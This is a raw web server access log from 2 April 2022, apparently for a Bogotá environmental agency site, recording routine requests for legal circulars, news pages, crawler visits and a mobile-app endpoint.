172.22.2.4 - - [02/Apr/2022:16:46:03 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%203%20del%2023%20de%20Marzo%20de%202012.pdf HTTP/1.1" 200 572950
172.22.2.4 - - [02/Apr/2022:16:46:09 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%202%20del%2014%20de%20Marzo%20de%202012.pdf HTTP/1.1" 200 113666
186.80.102.210 - - [02/Apr/2022:16:46:11 -0500] "GET /conozca-el-balance-de-las-acciones-de-control-a-los-establecimientos-que-trabajan-con-llantas-nuevas-o-usadas-en-bogota.html HTTP/1.1" 200 1056
172.22.2.4 - - [02/Apr/2022:16:46:14 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2016%20del%2022%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 381186
172.22.2.4 - - [02/Apr/2022:16:46:20 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2015%20del%2022%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 486506
172.22.2.4 - - [02/Apr/2022:16:46:28 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2014%20del%2011%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 3427471
172.22.2.4 - - [02/Apr/2022:16:46:35 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2013%20del%2006%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 351421
172.22.2.4 - - [02/Apr/2022:16:46:41 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2012%20del%2028%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 369945
172.22.2.4 - - [02/Apr/2022:16:45:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [02/Apr/2022:16:46:48 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2011%20del%2027%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 526945
172.22.2.4 - - [02/Apr/2022:16:45:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51365
172.22.2.4 - - [02/Apr/2022:16:46:52 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [02/Apr/2022:16:46:55 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2022%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1563219
172.22.2.4 - - [02/Apr/2022:16:47:00 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%201%20del%2017%20de%20Enero%20de%202012.pdf HTTP/1.1" 200 1118749
216.245.221.92 - - [02/Apr/2022:16:47:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:16:47:07 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%209%20del%2003%20de%20Noviembre%20de%202011.pdf HTTP/1.1" 200 54568
69.171.251.5 - - [02/Apr/2022:16:47:10 -0500] "GET /incautadas-tarantulas-que-iban-a-ser-exportadas-ilegalmente-desde-bogota-hasta-mexico.html HTTP/1.1" 206 899
69.171.251.5 - - [02/Apr/2022:16:47:10 -0500] "GET /incautadas-tarantulas-que-iban-a-ser-exportadas-ilegalmente-desde-bogota-hasta-mexico.html HTTP/1.1" 206 899
69.171.251.5 - - [02/Apr/2022:16:47:10 -0500] "GET /incautadas-tarantulas-que-iban-a-ser-exportadas-ilegalmente-desde-bogota-hasta-mexico.html HTTP/1.1" 206 899
69.171.251.7 - - [02/Apr/2022:16:47:10 -0500] "GET /incautadas-tarantulas-que-iban-a-ser-exportadas-ilegalmente-desde-bogota-hasta-mexico.html HTTP/1.1" 206 899
69.171.251.16 - - [02/Apr/2022:16:47:10 -0500] "GET /incautadas-tarantulas-que-iban-a-ser-exportadas-ilegalmente-desde-bogota-hasta-mexico.html HTTP/1.1" 206 899
69.171.251.1 - - [02/Apr/2022:16:47:10 -0500] "GET /incautadas-tarantulas-que-iban-a-ser-exportadas-ilegalmente-desde-bogota-hasta-mexico.html HTTP/1.1" 206 899
172.22.2.4 - - [02/Apr/2022:16:47:13 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%208%20del%2020%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 285158
172.22.2.4 - - [02/Apr/2022:16:47:19 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2023%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 200 1107785
172.22.2.4 - - [02/Apr/2022:16:47:26 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2015%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 314873
172.22.2.4 - - [02/Apr/2022:16:47:33 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2029%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 262144
172.22.2.4 - - [02/Apr/2022:16:47:45 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2023%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 252800
172.22.2.4 - - [02/Apr/2022:16:47:54 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 1488992
172.22.2.4 - - [02/Apr/2022:16:48:01 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 431796
172.22.2.4 - - [02/Apr/2022:16:48:07 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%204%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 399895
172.22.2.4 - - [02/Apr/2022:16:48:13 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%204%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 601047
172.22.2.4 - - [02/Apr/2022:16:48:20 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%203%20del%2023%20de%20Junio%20de%202011.pdf HTTP/1.1" 200 1452758
45.155.204.146 - - [02/Apr/2022:16:49:34 -0500] "GET / HTTP/1.1" 200 319
173.252.107.12 - - [02/Apr/2022:16:51:05 -0500] "GET /images/ecositemas-cerros-10-marzo.jpg HTTP/1.1" 200 85534
172.22.2.4 - - [02/Apr/2022:16:50:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [02/Apr/2022:16:52:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:16:50:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
186.86.34.46 - - [02/Apr/2022:16:52:59 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html HTTP/1.1" 200 1264
207.46.13.199 - - [02/Apr/2022:16:53:29 -0500] "GET /BLA/resoluciones/AUTOS%202018/2355.pdf HTTP/1.1" 304 -
172.22.2.4 - - [02/Apr/2022:16:55:24 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
216.245.221.92 - - [02/Apr/2022:16:57:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2022:16:55:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.97 - - [02/Apr/2022:16:58:27 -0500] "-" 408 -
172.22.2.4 - - [02/Apr/2022:16:56:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
186.102.91.132 - - [02/Apr/2022:17:01:38 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19y//tIY+TDORHruIamsHIQJ0MbVFpd1rv/FCzMy8JjtfpQdT7iu9jU&y=U2FsdGVkX189+c+OA1pRgmgicnOXcsgu/cEOWrodUbjxNptT8Z+v3IcY0FCJrU9O HTTP/1.1" 200 30
186.102.91.132 - - [02/Apr/2022:17:01:51 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.91.132 - - [02/Apr/2022:17:01:51 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.91.132 - - [02/Apr/2022:17:01:55 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.91.132 - - [02/Apr/2022:17:01:55 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.91.132 - - [02/Apr/2022:17:01:58 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
207.46.13.199 - - [02/Apr/2022:17:01:59 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 303054
186.102.91.132 - - [02/Apr/2022:17:01:58 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
216.245.221.92 - - [02/Apr/2022:17:02:02 -0500] "HEAD / HTTP/1.1" 200 -
186.102.91.132 - - [02/Apr/2022:17:02:03 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.91.132 - - [02/Apr/2022:17:02:03 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.91.132 - - [02/Apr/2022:17:02:21 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19yqu54QiV8/Txx2RhjuGN/7I4jjNCLlY11U6kLJmeiIfJyXuj8udjnml49slAO9H7deujv0JUdHigsFCd5QmFG//Npa741u3+0hmZFvgYgqT+q3/IWvd3GzRcSgmwUwxsmI4UoNlr6xZsRn/WyFBHhNtL8jRvVjmkYpHA/+3pXaHpotdRZg4op8RhpqPhkXP96z1z0hV+/bOYqP022+OAM0k/e78rPAcfFHvqHGGU8EhzWT1cNg/crr5ahjyYdDyDoAvdDHbxfyw==&u=U2FsdGVkX1/tLurYvAvAfTkdOPwQElvc8TbZULCuCO0=&y=U2FsdGVkX1/c2LC07ix5lTjrZnCZvpEwEbzihYZEHCU= HTTP/1.1" 200 25
